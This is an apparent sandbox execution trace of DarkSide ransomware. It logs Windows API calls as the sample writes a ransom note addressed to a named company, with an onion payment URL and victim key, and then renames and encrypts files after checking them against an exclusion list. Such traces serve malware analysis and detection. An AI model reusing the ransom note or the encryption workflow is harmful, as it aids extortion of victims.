[0167.869] _wcsicmp (_Str1="default", _Str2="YiCZnZd3WoEZPYnVg") returned -21 [0167.869] wcslen (_String="default") returned 0x7 [0167.869] wcscpy (in: _Dest=0x210e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*" [0167.869] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*") returned 0x2c [0167.869] wcscpy (in: _Dest=0x210e76, _Source="YiCZnZd3WoEZPYnVg" | out: _Dest="YiCZnZd3WoEZPYnVg") returned="YiCZnZd3WoEZPYnVg" [0167.869] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3480048 [0167.870] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0167.870] wcscpy (in: _Dest=0x3480048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg" [0167.870] GetNamedSecurityInfoW () returned 0x0 [0167.871] SetEntriesInAclW () returned 0x0 [0167.871] SetNamedSecurityInfoW () returned 0x0 [0167.873] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x22c388) returned 1 [0167.873] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32e8ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0167.873] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg")) returned 1 [0167.873] strlen (_Str="----------- [ Welcome to DarkSide - I-D Foods Corporation] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/LYID3U99RAJSTEYEFWS6SLYDGMUXKNAT3OPKN9D56PIGX1QHBU5DHGUN4HGMX2IW \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n 9NtjyWHbqWYTbhBpJ2ht4tKo7DQgTGmQ4IGHCFvgjiSMTNopVgQ9YIh9KRWkQgmvxviZtJGOakzykMzWKRgxwf2pCxpdMT8iGlKcsSOsxVOUXIGEgpy6tLqliTTEKWnohcYOhCF3DYMePMxEYa0eCmED1EXEG5QOZCpmkgDl5s5VSUF5uhnKsunUtKGS24iEAr2hxsJ1zMcMHmKVrf3bvRyhYVKXwlXVggxE7ncowldcK3v3CiKC24jKVd6OH5QrhVyyQLrFM5RE3Y0RcTeRTIqf1J5CIEhTiG3TH7SEpws4wfkt9RZ7rBWT4n3B69Z9JuPzyFCBwPKF7gTzEYzixIGzFbJyLSZXff9ryv3yL3JeKywAcoBafos0dLSkRgf1X1a1S2ud4kXa5GRU4W7rhCQsnJ8vAcv1AXaPRq9ESySBWQdGCQMSci0ex0oE4EfCDW3jjyXtaPofqNFhibodJFmOyTKwie1OcW6Kh6Ih6JxXXfUXr4VbRILzsiPXsOTTisDaEicID1E0SJRluBus2UhPyogJiZ7UpmUu9LUe3yAi3Bhox3pLv8E \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0x7ca [0167.873] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0167.876] WriteFile (in: hFile=0x1bc, lpBuffer=0x17dc98*, nNumberOfBytesToWrite=0x7ca, lpNumberOfBytesWritten=0x32e8bc, lpOverlapped=0x0 | out: lpBuffer=0x17dc98*, lpNumberOfBytesWritten=0x32e8bc*=0x7ca, lpOverlapped=0x0) returned 1 [0167.876] CloseHandle (hObject=0x1bc) returned 1 [0167.877] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0167.877] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg")) returned 0x10 [0167.877] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\") returned="" [0167.877] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\") returned 0x3d [0167.877] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\*", fInfoLevelId=0x0, lpFindFileData=0x32eb1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32eb1c) returned 0x154188 [0167.877] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55088ea0, ftCreationTime.dwHighDateTime=0x1d5d9e5, ftLastAccessTime.dwLowDateTime=0x91c24f40, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91c24f40, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.878] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc010e400, ftCreationTime.dwHighDateTime=0x1d5e41b, ftLastAccessTime.dwLowDateTime=0xf4ff7b90, ftLastAccessTime.dwHighDateTime=0x1d5e81c, ftLastWriteTime.dwLowDateTime=0xf4ff7b90, ftLastWriteTime.dwHighDateTime=0x1d5e81c, nFileSizeHigh=0x0, nFileSizeLow=0x751e, dwReserved0=0x0, dwReserved1=0x0, cFileName="AhvF9NsMQwDs1mv.gif", cAlternateFileName="AHVF9N~1.GIF")) returned 1 [0167.878] _wcsicmp (_Str1="AhvF9NsMQwDs1mv.gif", _Str2="README.c06622a1.TXT") returned -17 [0167.878] wcsstr (_Str="AhvF9NsMQwDs1mv.gif", _SubStr="README") returned 0x0 [0167.878] _wcsicmp (_Str1="autorun.inf", _Str2="AhvF9NsMQwDs1mv.gif") returned 13 [0167.878] wcslen (_String="autorun.inf") returned 0xb [0167.878] _wcsicmp (_Str1="boot.ini", _Str2="AhvF9NsMQwDs1mv.gif") returned 1 [0167.878] wcslen (_String="boot.ini") returned 0x8 [0167.878] _wcsicmp (_Str1="bootfont.bin", _Str2="AhvF9NsMQwDs1mv.gif") returned 1 [0167.878] wcslen (_String="bootfont.bin") returned 0xc [0167.878] _wcsicmp (_Str1="bootsect.bak", _Str2="AhvF9NsMQwDs1mv.gif") returned 1 [0167.878] wcslen (_String="bootsect.bak") returned 0xc [0167.878] _wcsicmp (_Str1="desktop.ini", _Str2="AhvF9NsMQwDs1mv.gif") returned 3 [0167.879] wcslen (_String="desktop.ini") returned 0xb [0167.879] _wcsicmp (_Str1="iconcache.db", _Str2="AhvF9NsMQwDs1mv.gif") returned 8 [0167.879] wcslen (_String="iconcache.db") returned 0xc [0167.879] _wcsicmp (_Str1="ntldr", _Str2="AhvF9NsMQwDs1mv.gif") returned 13 [0167.879] wcslen (_String="ntldr") returned 0x5 [0167.879] _wcsicmp (_Str1="ntuser.dat", _Str2="AhvF9NsMQwDs1mv.gif") returned 13 [0167.879] wcslen (_String="ntuser.dat") returned 0xa [0167.879] _wcsicmp (_Str1="ntuser.dat.log", _Str2="AhvF9NsMQwDs1mv.gif") returned 13 [0167.879] wcslen (_String="ntuser.dat.log") returned 0xe [0167.879] _wcsicmp (_Str1="ntuser.ini", _Str2="AhvF9NsMQwDs1mv.gif") returned 13 [0167.879] wcslen (_String="ntuser.ini") returned 0xa [0167.879] _wcsicmp (_Str1="thumbs.db", _Str2="AhvF9NsMQwDs1mv.gif") returned 19 [0167.879] wcslen (_String="thumbs.db") returned 0x9 [0167.879] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0167.879] wcslen (_String="386") returned 0x3 [0167.879] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0167.879] wcslen (_String="adv") returned 0x3 [0167.879] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0167.879] wcslen (_String="ani") returned 0x3 [0167.879] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0167.879] wcslen (_String="bat") returned 0x3 [0167.879] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0167.880] wcslen (_String="bin") returned 0x3 [0167.880] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0167.880] wcslen (_String="cab") returned 0x3 [0167.880] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0167.880] wcslen (_String="cmd") returned 0x3 [0167.880] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0167.880] wcslen (_String="com") returned 0x3 [0167.880] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0167.880] wcslen (_String="cpl") returned 0x3 [0167.880] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0167.880] wcslen (_String="cur") returned 0x3 [0167.880] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0167.880] wcslen (_String="deskthemepack") returned 0xd [0167.880] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0167.880] wcslen (_String="diagcab") returned 0x7 [0167.880] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0167.880] wcslen (_String="diagcfg") returned 0x7 [0167.880] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0167.880] wcslen (_String="diagpkg") returned 0x7 [0167.880] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0167.880] wcslen (_String="dll") returned 0x3 [0167.880] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0167.880] wcslen (_String="drv") returned 0x3 [0167.880] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0167.881] wcslen (_String="exe") returned 0x3 [0167.881] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0167.881] wcslen (_String="hlp") returned 0x3 [0167.881] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0167.881] wcslen (_String="icl") returned 0x3 [0167.881] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0167.881] wcslen (_String="icns") returned 0x4 [0167.881] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0167.881] wcslen (_String="ico") returned 0x3 [0167.881] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0167.881] wcslen (_String="ics") returned 0x3 [0167.881] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0167.881] wcslen (_String="idx") returned 0x3 [0167.881] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0167.881] wcslen (_String="ldf") returned 0x3 [0167.881] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0167.881] wcslen (_String="lnk") returned 0x3 [0167.881] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0167.881] wcslen (_String="mod") returned 0x3 [0167.881] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0167.881] wcslen (_String="mpa") returned 0x3 [0167.881] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0167.881] wcslen (_String="msc") returned 0x3 [0167.881] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0167.881] wcslen (_String="msp") returned 0x3 [0167.881] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0167.881] wcslen (_String="msstyles") returned 0x8 [0167.881] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0167.882] wcslen (_String="msu") returned 0x3 [0167.882] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0167.882] wcslen (_String="nls") returned 0x3 [0167.882] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0167.882] wcslen (_String="nomedia") returned 0x7 [0167.882] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0167.882] wcslen (_String="ocx") returned 0x3 [0167.882] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0167.882] wcslen (_String="prf") returned 0x3 [0167.882] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0167.882] wcslen (_String="ps1") returned 0x3 [0167.882] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0167.882] wcslen (_String="rom") returned 0x3 [0167.882] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0167.882] wcslen (_String="rtp") returned 0x3 [0167.882] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0167.882] wcslen (_String="scr") returned 0x3 [0167.882] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0167.882] wcslen (_String="shs") returned 0x3 [0167.882] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0167.882] wcslen (_String="spl") returned 0x3 [0167.882] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0167.882] wcslen (_String="sys") returned 0x3 [0167.882] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0167.882] wcslen (_String="theme") returned 0x5 [0167.882] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0167.882] wcslen (_String="themepack") returned 0x9 [0167.882] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0167.883] wcslen (_String="wpx") returned 0x3 [0167.883] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0167.883] wcslen (_String="lock") returned 0x4 [0167.883] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0167.883] wcslen (_String="key") returned 0x3 [0167.883] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0167.883] wcslen (_String="hta") returned 0x3 [0167.883] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0167.883] wcslen (_String="msi") returned 0x3 [0167.883] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0167.883] wcslen (_String="pdb") returned 0x3 [0167.883] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0167.883] wcslen (_String="sqlite") returned 0x6 [0167.883] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg")) returned 0x10 [0167.883] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0167.883] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg" [0167.883] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg") returned 0x3c [0167.883] wcscpy (in: _Dest=0x32400da, _Source="AhvF9NsMQwDs1mv.gif" | out: _Dest="AhvF9NsMQwDs1mv.gif") returned="AhvF9NsMQwDs1mv.gif" [0167.883] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\AhvF9NsMQwDs1mv.gif", dwFileAttributes=0x80) returned 1 [0167.884] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\AhvF9NsMQwDs1mv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg\\ahvf9nsmqwds1mv.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0167.884] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.884] ReadFile (in: hFile=0x1c8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0167.885] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0xc902c9be [0167.885] RtlComputeCrc32 (PartialCrc=0xc9be, Buffer=0x32e9a4, Length=0x80) returned 0xf13a533d [0167.885] RtlComputeCrc32 (PartialCrc=0x533d, Buffer=0x32e9a4, Length=0x80) returned 0x23dea9f6 [0167.885] RtlComputeCrc32 (PartialCrc=0xa9f6, Buffer=0x32e9a4, Length=0x80) returned 0xc7822797 [0167.885] RtlComputeCrc32 (PartialCrc=0x2797, Buffer=0x32e9a4, Length=0x80) returned 0x6f46eeb9 [0167.885] CloseHandle (hObject=0x1c8) returned 1 [0167.885] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0167.885] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\AhvF9NsMQwDs1mv.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\AhvF9NsMQwDs1mv.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\AhvF9NsMQwDs1mv.gif" [0167.885] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\AhvF9NsMQwDs1mv.gif") returned 0x50 [0167.885] wcscpy (in: _Dest=0x3250108, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.885] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\AhvF9NsMQwDs1mv.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg\\ahvf9nsmqwds1mv.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\AhvF9NsMQwDs1mv.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg\\ahvf9nsmqwds1mv.gif.c06622a1"), dwFlags=0x8) returned 1 [0167.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YiCZnZd3WoEZPYnVg\\AhvF9NsMQwDs1mv.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yicznzd3woezpynvg\\ahvf9nsmqwds1mv.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c8 [0167.887] CreateIoCompletionPort (FileHandle=0x1c8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.887] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3b90020 [0167.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x68c1f88a [0167.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x418d8cc4 [0167.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x262b112 [0167.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x43819f1a [0167.896] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x62ab1170 [0167.897] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x78c5d997 [0167.897] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1d271d9e [0167.897] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x24ccec31 [0167.900] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3b90094, Length=0x80) returned 0x9cd57cbf [0167.900] RtlComputeCrc32 (PartialCrc=0x7cbf, Buffer=0x3b90094, Length=0x80) returned 0xb4598be [0167.900] RtlComputeCrc32 (PartialCrc=0x98be, Buffer=0x3b90094, Length=0x80) returned 0x4544884e [0167.900] RtlComputeCrc32 (PartialCrc=0x884e, Buffer=0x3b90094, Length=0x80) returned 0x46e71819 [0167.900] RtlComputeCrc32 (PartialCrc=0x1819, Buffer=0x3b90094, Length=0x80) returned 0x38fc8884 [0167.900] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3b90020) returned 1 [0167.900] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0167.900] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0167.900] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c24f40, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x91c24f40, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91c24f40, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0167.900] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0167.900] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf648940, ftCreationTime.dwHighDateTime=0x1d5db19, ftLastAccessTime.dwLowDateTime=0x30a2e500, ftLastAccessTime.dwHighDateTime=0x1d5e594, ftLastWriteTime.dwLowDateTime=0x30a2e500, ftLastWriteTime.dwHighDateTime=0x1d5e594, nFileSizeHigh=0x0, nFileSizeLow=0x3998, dwReserved0=0x0, dwReserved1=0x0, cFileName="X8yu.png", cAlternateFileName="")) returned 1 [0167.900] _wcsicmp (_Str1="X8yu.png", _Str2="README.c06622a1.TXT") returned 6 [0167.900] wcsstr (_Str="X8yu.png", _SubStr="README") returned 0x0 [0167.900] _wcsicmp (_Str1="autorun.inf", _Str2="X8yu.png") returned -23 [0167.901] wcslen (_String="autorun.inf") returned 0xb [0167.901] _wcsicmp (_Str1="boot.ini", _Str2="X8yu.png") returned -22 [0167.901] wcslen (_String="boot.ini") returned 0x8 [0167.901] _wcsicmp (_Str1="bootfont.bin", _Str2="X8yu.png") returned -22 [0167.901] wcslen (_String="bootfont.bin") returned 0xc [0167.901] _wcsicmp (_Str1="bootsect.bak", _Str2="X8yu.png") returned -22 [0167.901] wcslen (_String="bootsect.bak") returned 0xc [0167.901] _wcsicmp (_Str1="desktop.ini", _Str2="X8yu.png") returned -20 [0167.901] wcslen (_String="desktop.ini") returned 0xb [0167.901] _wcsicmp (_Str1="iconcache.db", _Str2="X8yu.png") returned -15 [0167.901] wcslen (_String="iconcache.db") returned 0xc [0167.901] _wcsicmp (_Str1="ntldr", _Str2="X8yu.png") returned -10 [0167.901] wcslen (_String="ntldr") returned 0x5 [0167.901] _wcsicmp (_Str1="ntuser.dat", _Str2="X8yu.png") returned -10 [0167.901] wcslen (_String="ntuser.dat") returned 0xa [0167.901] _wcsicmp (_Str1="ntuser.dat.log", _Str2="X8yu.png") returned -10 [0167.901] wcslen (_String="ntuser.dat.log") returned 0xe [0167.901] _wcsicmp (_Str1="ntuser.ini", _Str2="X8yu.png") returned -10 [0167.901] wcslen (_String="ntuser.ini") returned 0xa [0167.901] _wcsicmp (_Str1="thumbs.db", _Str2="X8yu.png") returned -4 [0167.901] wcslen (_String="thumbs.db") returned 0x9 [0167.901] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0167.901] wcslen (_String="386") returned 0x3 [0167.901] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0167.901] wcslen (_String="adv") returned 0x3 [0167.901] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0167.902] wcslen (_String="ani") returned 0x3 [0167.902] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0167.902] wcslen (_String="bat") returned 0x3 [0167.902] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0167.902] wcslen (_String="bin") returned 0x3 [0167.902] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0167.902] wcslen (_String="cab") returned 0x3 [0167.902] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0167.902] wcslen (_String="cmd") returned 0x3 [0167.902] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0167.902] wcslen (_String="com") returned 0x3 [0167.902] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0167.902] wcslen (_String="cpl") returned 0x3 [0167.902] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0167.902] wcslen (_String="cur") returned 0x3 [0167.902] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0167.902] wcslen (_String="deskthemepack") returned 0xd [0167.902] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0167.902] wcslen (_String="diagcab") returned 0x7 [0167.902] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0167.902] wcslen (_String="diagcfg") returned 0x7 [0167.902] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0167.902] wcslen (_String="diagpkg") returned 0x7 [0167.902] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0167.902] wcslen (_String="dll") returned 0x3 [0167.902] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0167.902] wcslen (_String="drv") returned 0x3 [0167.902] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0167.903] wcslen (_String="exe") returned 0x3 [0167.903] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0167.903] wcslen (_String="hlp") returned 0x3 [0167.903] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0167.903] wcslen (_String="icl") returned 0x3 [0167.903] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0167.903] wcslen (_String="icns") returned 0x4 [0167.903] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0167.903] wcslen (_String="ico") returned 0x3 [0167.903] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0167.903] wcslen (_String="ics") returned 0x3 [0167.903] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0167.903] wcslen (_String="idx") returned 0x3 [0167.903] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0167.903] wcslen (_String="ldf") returned 0x3 [0167.903] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0167.903] wcslen (_String="lnk") returned 0x3 [0167.903] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0167.903] wcslen (_String="mod") returned 0x3 [0167.903] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0167.903] wcslen (_String="mpa") returned 0x3 [0167.903] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0167.903] wcslen (_String="msc") returned 0x3 [0167.903] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0167.903] wcslen (_String="msp") returned 0x3 